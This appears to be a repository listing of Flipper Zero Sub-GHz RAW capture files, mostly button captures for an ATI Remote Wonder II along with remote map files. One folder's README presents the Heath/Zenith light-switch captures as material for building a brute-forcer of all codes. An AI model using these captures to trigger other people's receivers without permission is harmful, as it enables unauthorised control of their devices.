-358 105 -806 131 -492 101 -486 139 -638 137 -630 133 -656 133 -620 131 -139268 99 -926 199 -998 363 -132 201 -134 893 -68 40989 -100 9887 -66 8731 -164 10859 -98 3745 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Rew.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 67 -300 197 -530 131 -698 65 -198 129 -328 165 -734 99 -232 199 -298 197 -132 131 -596 65 -400 65 -760 65 -132 133 -132 527 -196 131 -462 163 -230 97 -164 99 -4818 167 -132 67 -3386 63 -132 99 -3350 165 -7124 65 -66 65 -1120 65 -2548 65 -864 65 -1862 65 -234 297 -298 231 -132 163 -630 199 -330 131 -730 67 -430 131 -924 65 -2454 99 -64 97 -6914 99 -990 133 -234 99 -298 65 -3116 97 -1260 99 -264 63 -1184 131 -494 97 -1952 65 -264 99 -398 265 -1764 65 -832 199 -6712 99 -624 65 -496 197 -524 163 -7312 65 -98 131 -890 231 -1230 131 -2246 131 -168 65 -504 65 -858 65 -430 97 -134 199 -532 65 -200 197 -100 99 -800 165 -66 165 -232 99 -232 65 -366 97 -658 99 -228 99 -590 99 -330 65 -228 99 -264 99 -498 97 -200 99 -168 99 -200 101 -100 99 -896 99 -428 167 -862 65 -490 263 -3776 295 -132 129 -526 65 -790 133 -132 99 -462 99 -5244 99 -2720 517 -294 89 -356 103 -684 105 -336 95 -520 101 -824 99 -358 69 -338 127 -354 105 -652 105 -830 99 -494 131 -482 103 -340 97 -674 131 -642 131 -476 141 -90432 417 -100986 393 -344 103 -360 105 -658 97 -338 105 -492 97 -858 103 -338 95 -350 105 -324 107 -654 131 -812 133 -492 99 -492 133 -298 141 -628 137 -644 137 -466 135 -144916 231 -464 97 -164 97 -3096 63 -528 133 -626 99 -328 99 -66 65 -266 131 -1978 197 -366 99 -1858 97 -532 165 -296 229 -264 359 -1030 165 -236 67 -564 131 -168 97 -664 429 -166 327 -164 131 -2432 131 -6192 197 -690 199 -994 99 -1444 197 -360 165 -130 131 -228 229 -1252 195 -198 133 -336 99 -1712 131 -1124 299 -954 329 -396 165 -66 199 -234 165 -2910 99 -1058 163 -6988 299 -566 131 -330 231 -298 99 -5212 99 -7508 165 -426 165 -200 329 -364 65 -232 133 -792 63 -7204 165 -198 99 -68 165 -134 97 -202 99 -830 231 -1856 99 -364 99 -132 199 -464 133 -1656 65 -794 167 -564 99 -1592 97 -532 167 -832 363 -98 265 -330 131 -362 361 -166 97 -132 97 -198 97 -428 361 -230 63 -592 297 -3474 431 -466 99 -100 131 -528 99 -796 131 -100 99 -232 131 -100 163 -100 329 -922 331 -196 99 -132 163 -1686 65 -1462 65 -1394 65 -334 65 -98 199 -3908 65 -5148 99 -66 99 -696 65 -2656 63 -860 231 -6588 359 -464 163 -396 295 -332 133 -296 99 -166 65 -4192 67 -330 63 -460 295 -98 65 -2124 163 -4208 65 -2072 97 -6998 165 -362 131 -164 195 -626 297 -66 199 -2220 229 -6828 99 -332 397 -500 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Right.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 163 -494 97 -330 459 -198 131 -368 67 -630 229 -334 131 -1460 231 -460 133 -532 463 -598 99 -630 199 -66 65 -232 165 -624 361 -2304 163 -3162 197 -660 65 -366 231 -462 101 -132 199 -4084 65 -6952 65 -164 65 -230 163 -494 197 -594 163 -230 97 -1848 65 -130 65 -232 133 -498 165 -198 131 -98 229 -198 231 -366 165 -562 65 -2020 131 -2568 63 -166 395 -364 163 -66 97 -362 97 -266 99 -3656 99 -7048 99 -98 133 -896 165 -66 233 -370 265 -1360 65 -996 99 -2058 331 -232 165 -232 67 -298 165 -100 65 -296 265 -100 163 -166 165 -68 297 -560 165 -100 233 -398 163 -432 99 -432 65 -66 199 -890 65 -66 97 -132 67 -366 131 -362 99 -362 329 -100 263 -298 229 -294 65 -560 65 -134 331 -164 131 -164 97 -194 97 -4802 163 -758 99 -100 131 -330 131 -1556 165 -132 265 -234 199 -234 133 -364 229 -166 99 -168 165 -200 231 -196 65 -98 97 -462 295 -198 97 -462 131 -360 65 -98 97 -364 461 -688 331 -198 131 -230 161 -198 263 -988 65 -98 363 -198 63 -228 131 -66 197 -1944 63 -624 97 -4750 67 -4670 67 -564 65 -268 99 -498 65 -234 199 -1942 63 -722 479 -294 121 -304 155 -634 129 -308 153 -466 131 -794 171 -268 153 -292 179 -282 135 -298 141 -792 163 -446 141 -480 133 -460 165 -452 129 -640 129 -806 161 -90424 429 -100972 423 -4868 65 -524 67 -730 65 -850 69 -151980 99 -130 65 -328 99 -66 165 -132 163 -166 131 -66 97 -298 131 -164 131 -230 361 -100 129 -394 97 -166 161 -228 65 -132 129 -362 97 -460 65 -100 131 -596 99 -762 99 -1026 65 -98 131 -198 131 -460 99 -130 197 -132 393 -98 131 -232 431 -164 65 -296 329 -692 99 -700 197 -164 265 -132 131 -928 65 -132 131 -234 67 -530 65 -396 229 -5672 131 -130 99 -164 65 -3822 131 -7082 97 -294 131 -1126 133 -66 299 -298 165 -232 65 -234 263 -132 297 -5908 133 -664 65 -264 99 -64 363 -232 65 -166 165 -198 165 -5782 99 -392 197 -1646 167 -2658 65 -828 65 -3416 165 -394 65 -1782 65 -2656 65 -6842 65 -66 295 -1122 195 -956 65 -624 131 -7064 197 -234 65 -166 65 -132 133 -164 131 -1254 65 -2008 99 -666 65 -7094 65 -726 197 -852 65 -264 263 -232 133 -200 167 -2284 67 -830 165 -100 67 -134 65 -696 229 -698 97 -66 263 -2618 195 -196 131 -200 167 -198 99 -166 333 -1098 265 -68 465 -298 99 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Stop.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 399 -232 99 -662 199 -894 65 -66 99 -334 131 -234 65 -166 197 -1880 63 -528 197 -1054 97 -298 97 -100 133 -132 399 -760 263 -360 65 -756 361 -66 65 -132 97 -2610 65 -4658 97 -3824 233 -8036 63 -398 97 -468 67 -2646 195 -922 131 -64 99 -888 195 -328 163 -8102 67 -430 65 -332 65 -300 133 -6632 297 -98 133 -662 99 -3850 99 -6952 99 -64 163 -228 63 -232 129 -924 65 -132 67 -266 65 -396 129 -1318 65 -200 65 -3832 99 -1258 231 -1094 65 -800 65 -168 131 -200 67 -1526 65 -1630 65 -660 65 -7242 65 -826 99 -1348 131 -1714 363 -462 97 -134 65 -234 97 -198 131 -328 99 -164 131 -592 131 -788 197 -232 99 -470 99 -626 97 -1552 65 -134 333 -132 199 -332 199 -132 65 -134 131 -1054 97 -656 99 -628 97 -66 229 -328 131 -758 165 -130 127 -100 65 -264 131 -1892 331 -330 233 -100 65 -564 99 -364 133 -332 265 -1952 65 -1280 99 -6370 99 -5156 165 -2806 167 -366 99 -1254 131 -230 527 -316 105 -360 69 -690 99 -324 93 -536 65 -854 97 -340 93 -348 101 -336 125 -310 125 -834 103 -500 97 -504 129 -322 93 -830 125 -328 133 -456 137 -91338 417 -330 93 -336 127 -674 101 -316 135 -494 95 -836 103 -334 93 -340 125 -306 125 -330 101 -852 97 -506 99 -486 125 -330 135 -820 99 -358 105 -464 127 -91364 419 -312 135 -310 105 -664 137 -312 103 -486 139 -804 131 -306 123 -306 153 -298 137 -302 123 -796 155 -472 131 -466 173 -272 159 -766 161 -276 151 -490 131 -91326 427 -166930 129 -264 63 -1022 199 -100 99 -496 129 -7346 163 -364 163 -232 167 -400 65 -132 99 -264 295 -7242 165 -798 65 -560 131 -330 133 -1954 65 -6404 65 -3928 65 -430 331 -3320 65 -2450 167 -2590 99 -132 97 -362 97 -132 65 -162 97 -860 97 -100 131 -68 65 -198 165 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Tv.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 65 -6462 99 -756 361 -7880 65 -7660 99 -130 97 -6818 67 -6734 129 -662 293 -28248 65 -1664 131 -1260 65 -894 65 -332 65 -6250 65 -1652 67 -2218 165 -1230 65 -234 99 -732 131 -526 99 -132 99 -200 97 -832 197 -364 397 -330 99 -2606 165 -8808 97 -7062 131 -288 143 -282 169 -604 163 -284 153 -468 169 -752 163 -274 153 -308 171 -272 157 -276 153 -798 155 -430 167 -458 169 -286 143 -796 129 -630 161 -438 173 -90858 437 -10234 65 -90940 427 -101234 417 -188578 131 -7746 97 -396 65 -1152 131 -294 129 -4104 99 -7190 197 -1650 65 -7370 65 -268 131 -762 65 -8974 167 -6516 65 -2242 131 -562 99 -498 99 -7646 131 -2732 131 -2416 197 -2322 99 -566 97 -8476 65 -132 129 -196 97 -7750 65 -6942 65 -1424 67 -19916 97 -7846 65 -432 99 -8206 163 -17150 133 -2186 67 -5390 65 -368 65 -3888 65 -494 63 -590 129 -262 63 -986 97 -166 359 -462 131 -530 197 -734 129 -6338 131 -536 67 -9358 65 -7902 65 -232 233 -7310 67 -298 131 -6994 133 -466 99 -398 131 -8130 97 -230 133 -5730 65 -924 131 -1252 297 -164 229 -528 759 -132 261 -162 527 -460 65 -330 265 -1628 65 -828 265 -364 827 -266 99 -166 695 -366 989 -132 131 -294 67 -198 131 -132 493 -164 131 -130 131 -98 197 -132 163 -526 65 -98 363 -626 131 -130 165 -200 827 -366 233 -5174 301 -1626 99 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Up.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 365 -728 161 -266 99 -164 97 -200 65 -100 359 -332 63 -364 131 -2010 97 -196 99 -626 561 -332 133 -462 133 -402 163 -198 297 -100 133 -432 163 -756 361 -396 65 -66 197 -7188 631 -100 65 -300 165 -134 197 -500 165 -166 65 -1818 65 -2356 133 -3520 99 -4466 99 -98 133 -1762 99 -866 197 -98 165 -828 97 -698 99 -1158 361 -168 199 -198 99 -134 97 -464 63 -1120 525 -462 99 -796 65 -100 99 -166 97 -5258 99 -130 165 -1826 129 -166 163 -6862 65 -200 65 -1060 131 -598 231 -7538 99 -396 99 -728 131 -630 131 -100 99 -1752 227 -5916 131 -4548 197 -326 195 -394 97 -166 131 -132 99 -362 131 -166 133 -100 299 -896 265 -166 67 -500 231 -102 133 -532 263 -198 163 -132 261 -64 393 -132 165 -1124 131 -66 263 -328 165 -100 65 -664 265 -164 165 -736 67 -198 67 -98 99 -166 265 -466 229 -498 99 -330 231 -232 131 -196 163 -332 65 -100 431 -232 133 -3320 455 -314 127 -312 127 -640 165 -272 179 -426 167 -780 175 -272 127 -306 155 -272 155 -308 173 -760 163 -436 169 -458 127 -468 163 -438 173 -600 173 -270 153 -91332 455 -286 137 -300 123 -666 97 -306 127 -502 129 -810 133 -322 107 -306 123 -322 141 -314 133 -810 133 -458 131 -488 129 -476 123 -488 131 -626 135 -320 143 -91306 453 -280 143 -328 139 -620 129 -290 153 -468 135 -820 129 -276 155 -306 173 -272 125 -306 155 -800 121 -494 133 -458 169 -438 167 -422 157 -634 159 -276 173 -145630 65 -3818 97 -726 97 -468 165 -930 99 -462 97 -66 429 -856 131 -1520 131 -400 131 -1288 65 -266 97 -330 331 -198 131 -200 131 -6402 67 -6460 165 -266 97 -430 99 -854 99 -134 163 -5314 133 -3022 97 -2554 65 -1500 99 -666 67 -1556 131 -232 163 -66 261 -428 63 -264 99 -626 197 -2542 163 -5286 197 -2352 163 -68 197 -962 65 -166 265 -1162 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Vol+.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 199 -756 361 -7700 99 -12600 65 -26740 517 -282 143 -328 105 -652 129 -288 153 -472 133 -786 165 -288 143 -306 127 -306 123 -666 131 -800 123 -492 131 -454 165 -284 145 -466 133 -322 143 -274 155 -91310 451 -308 91 -334 123 -654 123 -324 133 -454 139 -810 131 -322 141 -282 139 -304 141 -628 139 -810 131 -492 135 -454 139 -310 131 -446 173 -274 163 -292 141 -91340 429 -4860 67 -374 65 -554 69 -370 65 -356 61 -91388 427 -2004 63 -384 67 -382 65 -880 65 -538 65 -516 95 -354 99 -520 63 -392 67 -378 69 -204464 97 -1282 99 -600 65 -17558 201 -9084 65 -19340 65 -11482 65 -16616 65 -7634 99 -7536 67 -1094 133 -13564 99 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Vol-.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 97 -14916 131 -3058 361 -87160 65 -13574 295 -232 99 -268 131 -926 67 -200 133 -630 65 -1958 131 -134 131 -800 131 -994 99 -264 67 -500 65 -4082 63 -9382 99 -18298 65 -3092 507 -258 163 -312 141 -628 139 -280 173 -420 173 -800 131 -292 179 -282 137 -296 143 -626 141 -810 131 -464 169 -416 173 -276 163 -440 173 -276 163 -438 175 -91322 429 -8222 61 -548 65 -372 63 -564 65 -91386 411 -314 95 -374 67 -692 65 -384 69 -526 103 -840 65 -380 103 -356 69 -344 103 -660 101 -848 99 -510 105 -498 97 -340 93 -516 99 -358 105 -498 97 -91334 437 -4002 65 -882 65 -556 65 -358 93 -504 99 -378 67 -526 65 -206644 165 -8006 97 -32392 65 -67730 63 -5854 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/remotes/Ati_arrows.txt: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubRem Map file 2 | Version: 1 3 | UP: /ext/subghz/ATI_Wonder_II/Up.sub 4 | DOWN: /ext/subghz/ATI_Wonder_II/Down.sub 5 | LEFT: /ext/subghz/ATI_Wonder_II/Left.sub 6 | RIGHT: /ext/subghz/ATI_Wonder_II/Right.sub 7 | OK: /ext/subghz/ATI_Wonder_II/Ok.sub 8 | ULABEL: Up 9 | DLABEL: Down 10 | LLABEL: Left 11 | RLABEL: Right 12 | OKLABEL: Ok 13 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/remotes/Ati_media.txt: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubRem Map file 2 | Version: 1 3 | UP: /ext/subghz/ATI_Wonder_II/Vol+.sub 4 | DOWN: /ext/subghz/ATI_Wonder_II/Vol-.sub 5 | LEFT: /ext/subghz/ATI_Wonder_II/Rew.sub 6 | RIGHT: /ext/subghz/ATI_Wonder_II/Ff.sub 7 | OK: /ext/subghz/ATI_Wonder_II/Pause.sub 8 | ULABEL: Vol+ 9 | DLABEL: Vol- 10 | LLABEL: Rew 11 | RLABEL: Ff 12 | OKLABEL: Play 13 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/remotes/Ati_media_alt.txt: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubRem Map file 2 | Version: 1 3 | UP: /ext/subghz/ATI_Wonder_II/F.sub 4 | DOWN: /ext/subghz/ATI_Wonder_II/Pause.sub 5 | LEFT: /ext/subghz/ATI_Wonder_II/Left.sub 6 | RIGHT: /ext/subghz/ATI_Wonder_II/Right.sub 7 | OK: /ext/subghz/ATI_Wonder_II/Play.sub 8 | ULABEL: Fullscreen 9 | DLABEL: Play 10 | LLABEL: Left 11 | RLABEL: Right 12 | OKLABEL: Pl 13 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/remotes/Ati_mouse.txt: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubRem Map file 2 | Version: 1 3 | UP: /ext/subghz/ATI_Wonder_II/Mouse_up.sub 4 | DOWN: /ext/subghz/ATI_Wonder_II/Mouse_down.sub 5 | LEFT: /ext/subghz/ATI_Wonder_II/Mouse_left.sub 6 | RIGHT: /ext/subghz/ATI_Wonder_II/Mouse_right.sub 7 | OK: /ext/subghz/ATI_Wonder_II/Click.sub 8 | ULABEL: Up 9 | DLABEL: Down 10 | LLABEL: Left 11 | RLABEL: Right 12 | OKLABEL: Click 13 | -------------------------------------------------------------------------------- /subghz/Health_Remote_Light_Switch_Bruteforce/README.md: -------------------------------------------------------------------------------- 1 | This is a collection of simple RAW captures of all the codes from the Health/Zenith Remote Light Switch. You should be able to add these into a playlist or concatenate them together in a fancy way to make a simple bruteforcer. 2 | 3 | The raw captures are separated into groups of On presses, and Off presses, for your convenience. 4 | 5 | NOTE: I've tested these on two different styles of Heath receivers. You may need to adjust between 315mhz and 310mhz for your particular receiver. Some seem to work better with one or the other. 6 | -------------------------------------------------------------------------------- /subghz/Health_Remote_Light_Switch_Bruteforce/off/1001_off.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 1821 -66 1093 -66 1725 -132 997 -166 1919 -98 1943 -100 3473 -100 4787 -102 697 -66 1947 -100 459 -64 1637 -132 1397 -66 1613 -66 2747 -100 665 -66 2199 -100 3447 -66 1651 -68 593 -66 1809 -100 591 -66 1591 -164 4465 -100 3215 -132 3385 -66 893 -98 6201 -66 1479 -100 659 -100 1089 -132 5735 -100 1115 -66 795 -132 2651 -132 267 -102 965 -100 567 -164 131 -66 15467 -168 1391 -68 557 -66 97 -66 925 -196 1441 -132 523 -100 887 -66 1061 -66 3349 -66 969 -98 2317 -66 5059 -102 3079 -132 195 -66 815 -66 1955 -98 6173 -66 3703 -130 2761 -130 1677 -166 3443 -98 1381 -98 1793 -66 1699 -98 2481 -66 1655 -98 327 -98 817 -66 1531 -66 627 -162 4979 -100 18413 -200 793 -100 4801 -66 295 -98 525 -130 691 -100 997 -98 293 -100 561 -66 401 -132 897 -66 399 -68 9679 -897234 199 -132 99 -100 1297 -100 2905 -66 5437 -66 3783 -66 1455 -66 565 -100 895 -68 12497 -68 5305 -66 4641 -64 1051 -98 487 -100 2121 -100 1723 -100 15395 -66 5615 -66 1261 -66 1711 -66 2005 -66 1049 -100 525 -64 2437 -98 3581 -66 2435 -230 1353 -102 763 -130 3733 -130 2089 -66 1725 -132 963 -68 1859 -134 3621 -200 1745 -98 593 -64 1841 -100 1481 -68 833 -100 661 -64 427 -100 2775 -66 13787 -98 957 -66 1055 -66 1117 -66 1223 -66 1463 -66 1689 -66 10311 -100 1551 -66 3217 -100 3685 -66 3081 -100 299 -66 2231 -134 2649 -98 167 -100 893 -98 465 -100 1247 -100 1961 -66 3609 -100 3255 -132 129 -100 3549 -64 881 -66 22911 -100 695 -66 1557 -66 1415 -132 825 -98 195 -100 2335 -98 327 -100 199 -100 1835 -66 887 -130 3587 -66 1561 -66 1943 -66 493 -132 753 -130 295 -132 11633 -132 2053 -134 131 -100 299 -66 1497 -66 725 -66 263 -100 695 -134 1061 -68 1959 -66 523 -66 1483 -68 3947 -134 335 -66 5169 -134 133 -66 4383 -66 1031 -100 10805 -98 931 -264 465 -98 2653 -100 1963 -102 1629 -64 1021 -66 2223 -66 1397 -100 2087 -66 5501 -66 10875 -66 11547 -132 263 -66 2493 -132 263 -168 429 -134 1193 -66 199 -134 333 -66 2883 -198 293 -66 3319 -132 995 -98 697 -132 2439 -100 325 -134 1297 -66 597 -66 795 -134 297 -66 2323 -68 7 | -------------------------------------------------------------------------------- /subghz/Health_Remote_Light_Switch_Bruteforce/off/1101_off_2.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 1031 -66 333 -166 133 -66 2614 -98 397 -98 1425 -100 1963 -66 2543 -66 891 -66 2887 -66 65 -66 2513 -64 1051 -100 2667 -100 999 -100 2063 -66 3323 -132 99 -66 297 -130 3019 -166 4279 -66 5123 -68 1493 -66 5263 -66 3415 -130 1913 -66 297 -68 11715 -100 2291 -100 1289 -100 233 -68 3653 -132 1741 -100 2593 -66 1639 -66 629 -66 3351 -66 861 -66 5031 -98 2801 -66 1483 -198 493 -98 395 -66 757 -64 525 -68 2023 -98 829 -66 3773 -98 2801 -66 2409 -100 1823 -100 4047 -100 2057 -66 733 -66 4671 -100 3131 -66 3297 -68 5145 -132 2253 -66 14809 -132 1313 -98 2461 -66 2911 -100 829 -100 1021 -66 3351 -66 295 -66 5647 -132 195 -64 493 -98 4539 -98 603 -66 1613 -102 1295 -98 1213 -262 1485 -66 5027 -100 1049 -66 393 -66 3145 -200 431 -132 2893 -100 8307 -66 531 -68 1029 -100 895 -66 2783 -134 21065 -130 1325 -66 259 -66 293 -66 427 -66 5281 -66 4961 -64 327 -64 621 -66 1515 -925776 65 -902 461 -398 621 -66 1223 -100 1595 -98 133 -66 2127 -166 297 -100 3087 -66 131 -164 327 -264 399 -66 2427 -68 1717 -166 1853 -66 2953 -100 3121 -132 999 -98 9985 -68 6281 -98 1217 -100 131 -66 10609 -362 763 -132 269 -100 3973 -132 367 -102 1865 -230 955 -98 1185 -66 2479 -98 1625 -98 2839 -66 2039 -66 3283 -66 527 -100 2193 -98 591 -100 1661 -100 1397 -66 535 -98 2387 -132 5731 -134 65 -66 893 -100 427 -132 3945 -66 625 -66 765 -98 663 -100 1095 -68 19387 -66 723 -66 1251 -98 591 -232 2355 -100 563 -100 825 -66 393 -66 559 -230 723 -98 131 -68 863 -64 365 -100 695 -66 629 -100 267 -66 1123 -66 393 -100 1325 -132 2217 -100 959 -66 795 -66 363 -132 399 -134 1881 -98 795 -200 65 -98 1677 -98 789 -66 923 -98 947 -230 429 -100 165 -66 955 -232 65 -98 623 -132 65 -132 129 -166 1743 -64 817 -134 465 -132 199 -164 265 -68 1731 -66 1127 -66 759 -164 1017 -98 527 -296 197 -198 199 -100 527 -166 133 -132 301 -66 299 -66 499 -100 431 -102 627 -100 299 -66 727 -68 887 -98 261 -66 789 -66 525 -98 293 -98 427 -232 399 -202 399 -166 199 -132 531 -66 397 -132 3407 -64 357 -132 197 -164 461 -132 133 -134 499 -200 857 -66 597 -100 765 -68 131 -132 133 -66 629 -66 301 -100 995 -134 693 -134 297 -264 665 -66 467 -100 959 -134 2635 -66 589 -66 789 -130 3135 -98 3945 -66 989 -230 497 -98 733 -66 5943 -100 2729 -100 659 -66 795 -66 231 -66 231 -134 303 -100 429 -132 1431 -166 727 -98 657 -68 7 | -------------------------------------------------------------------------------- /subghz/Health_Remote_Light_Switch_Bruteforce/off/1111_off_2.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 5155 -100 2255 -66 2483 -68 1627 -66 3972 -68 12525 -66 397 -66 1949 -66 5349 -66 2785 -66 267 -68 731 -100 1031 -100 893 -66 2749 -98 1345 -66 589 -66 2039 -100 2079 -132 131 -130 723 -68 1377 -132 1247 -230 527 -66 433 -100 165 -98 1623 -100 133 -166 1861 -66 11507 -166 1831 -64 819 -166 3711 -66 2731 -100 9309 -66 9351 -166 1151 -66 1515 -66 10569 -100 16387 -66 6383 -66 1385 -98 1231 -66 901 -66 627 -132 1857 -130 3089 -134 1133 -100 3519 -66 2857 -66 3321 -100 927 -68 1059 -98 559 -132 1413 -68 8945 -66 4417 -100 731 -66 1915 -132 2245 -98 1545 -132 2611 -132 589 -132 1189 -66 327 -66 3335 -66 5995 -66 10369 -100 1657 -100 1231 -100 627 -100 2269 -66 65 -66 1023 -66 949 -66 327 -64 3903 -98 2011 -66 2151 -100 3995 -66 1985 -66 1563 -66 2489 -68 1779 -98 261 -100 4753 -100 1561 -100 5779 -100 893 -100 4949 -66 4129 -955824 131 -264 97 -628 65 -134 65 -432 333 -98 399 -198 233 -202 3119 -66 4115 -66 1057 -100 431 -68 897 -100 1433 -132 5019 -166 231 -68 2371 -98 16641 -98 5255 -98 1181 -132 1643 -132 3451 -68 3689 -134 1857 -66 2065 -132 2321 -100 1337 -132 1495 -166 3749 -98 4007 -98 2809 -68 3913 -100 461 -100 2687 -98 293 -66 1017 -66 131 -98 525 -132 1939 -98 2541 -164 727 -132 923 -100 2731 -66 1779 -98 655 -100 6943 -66 5133 -132 3483 -66 1097 -166 2423 -66 4419 -132 1155 -66 983 -100 431 -132 561 -200 955 -66 231 -100 299 -98 1163 -166 165 -66 3549 -166 635 -66 165 -66 13553 -102 2687 -66 929 -132 893 -100 1615 -132 4217 -66 627 -98 493 -98 455 -166 1615 -66 729 -100 2301 -100 429 -100 231 -98 4163 -100 915 -66 13421 -66 7897 -98 2331 -98 4339 -66 531 -66 1463 -68 2653 -132 231 -66 299 -98 99 -66 629 -66 195 -66 263 -64 395 -132 1099 -100 361 -100 431 -68 1351 -198 2487 -100 3099 -198 1219 -132 1909 -100 523 -130 661 -100 561 -134 829 -100 2921 -134 367 -132 229 -134 4105 -394 689 -198 627 -134 97 -66 463 -166 827 -100 1063 -100 397 -132 1061 -166 465 -98 3339 -66 399 -100 2389 -100 861 -66 499 -98 1595 -130 589 -66 399 -98 665 -68 1329 -66 231 -198 1059 -132 2421 -100 919 -66 423 -66 665 -100 891 -132 723 -66 2127 -134 1445 -100 457 -66 2161 -100 3207 -66 395 -100 1485 -64 261 -66 1179 -100 227 -66 565 -98 265 -164 997 -132 1091 -66 2065 -66 365 -66 1291 -66 797 -98 1877 -98 495 -100 465 -66 663 -66 1185 -66 819 -64 293 -66 163 -64 425 -66 1943 -66 1093 -134 897 -98 7 | -------------------------------------------------------------------------------- /subghz/Health_Remote_Light_Switch_Bruteforce/on/0111_on_2.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 101 -1222 65 -986 97 -494 131 -654 65 -1252 97 -66 65 -498 65 -232 199 -134 233 -767 361 -198 97 -4030 65 -1128 65 -200 65 -398 133 -2324 65 -2042 65 -1202 65 -532 65 -100 97 -132 99 -2812 65 -1182 65 -1226 99 -1088 99 -3914 99 -1228 65 -466 231 -1264 65 -132 65 -566 131 -1960 167 -968 65 -1192 65 -1626 99 -2456 163 -196 65 -660 129 -230 63 -890 131 -2414 67 -1228 135 -200 131 -1028 63 -728 131 -2776 65 -468 65 -130 65 -368 65 -3696 131 -532 65 -566 131 -762 99 -2050 99 -1126 133 -362 65 -4050 65 -5044 67 -2892 97 -3520 99 -886 97 -1580 65 -1186 65 -526 131 -264 167 -1428 131 -964 65 -366 97 -696 167 -630 65 -730 65 -166 65 -266 65 -266 133 -132 165 -364 231 -332 65 -132 65 -264 65 -5972 65 -200 99 -398 99 -568 197 -430 99 -892 99 -198 133 -1322 131 -1330 99 -598 65 -198 65 -1220 131 -1396 99 -928 99 -2260 99 -98 97 -3724 65 -1690 131 -1708 195 -4866 65 -3194 129 -426 99 -860 199 -500 67 -3390 65 -4118 63 -2436 65 -2506 131 -1418 97 -3314 325 -887472 99 -632 165 -724 65 -2176 165 -3450 65 -2188 229 -262 97 -2022 65 -296 97 -328 163 -2766 63 -1710 65 -66 99 -6246 65 -2724 133 -438 65 -168 99 -1230 131 -132 165 -168 99 -1164 99 -488 97 -952 97 -164 227 -66 131 -132 131 -894 65 -266 67 -1428 99 -1858 65 -2228 165 -100 65 -1790 65 -828 65 -466 131 -634 99 -3882 63 -1114 131 -1528 99 -3434 131 -2686 65 -334 65 -6108 163 -432 99 -2908 101 -100 133 -262 163 -3528 65 -1252 67 -100 65 -1284 97 -9504 97 -1936 165 -6498 131 -2082 161 -462 329 -24412 97 -336 131 -930 97 -926 131 -2540 99 -4168 99 -3092 65 -3596 65 -1692 163 -2222 65 -7892 97 -766 67 -1228 97 -790 67 -1960 65 -100 65 -3286 163 -5128 65 -1334 67 -1360 129 -4714 97 -360 97 -3802 99 -1194 67 -8754 65 -1058 129 -460 165 -236 99 -696 65 -396 65 -786 63 -362 99 -1726 133 -164 199 -200 165 -66 163 -590 295 -264 327 -98 129 -1260 65 -298 165 -796 65 -500 97 -366 197 -1330 99 -3412 99 -1060 63 -4806 99 -1812 97 -658 65 -5664 63 -1118 65 -990 65 -334 97 -298 97 -786 99 -858 99 -566 165 -264 163 -1154 131 -1872 99 -3318 99 -4246 65 -132 97 -1226 99 -100 97 -500 131 -1766 99 -1292 63 -1576 197 -2448 99 -1460 99 -230 67 -3246 131 -430 99 -132 99 -7182 97 -1270 99 -368 65 -3312 99 -134 165 -1722 65 -698 67 -334 101 -628 97 -2550 163 -198 99 -596 131 -200 65 -2178 165 -3496 7 | -------------------------------------------------------------------------------- /subghz/Health_Remote_Light_Switch_Bruteforce/on/1011_on.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 315000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 65 -494 97 -232 97 -768 361 